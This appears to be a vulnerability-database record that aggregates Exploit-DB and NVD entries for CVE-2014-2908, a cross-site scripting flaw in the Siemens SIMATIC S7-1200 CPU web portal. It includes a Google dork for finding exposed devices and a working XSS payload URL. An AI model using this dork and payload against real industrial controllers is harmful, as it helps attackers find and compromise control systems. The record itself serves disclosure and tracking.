ID
VAR-E-201805-0053
CVE
| cve_id: | CVE-2014-2908 | Trust: 1.5 |
EDB ID
44687
TITLE
Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting - Linux webapps Exploit
Trust: 0.6
DESCRIPTION
Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting. CVE-2014-2908 . webapps exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | siemens | model: | simatic s7-1200 cpu | scope: | - | version: | - | Trust: 2.1 |
EXPLOIT
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908
http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Scripting
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
CREDITS
t4rkd3vilz
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 44687 | Trust: 1.6 |
| db: | NVD | id: | CVE-2014-2908 | Trust: 1.5 |
| db: | EDBNET | id: | 97928 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 147813 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-2908 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/44687/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 147813 |
| db: | EXPLOIT-DB | id: | 44687 |
| db: | EDBNET | id: | 97928 |
LAST UPDATE DATE
2022-07-27T09:44:39.397000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 147813 | date: | 2018-05-22T14:02:22 |
| db: | EXPLOIT-DB | id: | 44687 | date: | 2018-05-22T00:00:00 |
| db: | EDBNET | id: | 97928 | date: | 2018-05-22T00:00:00 |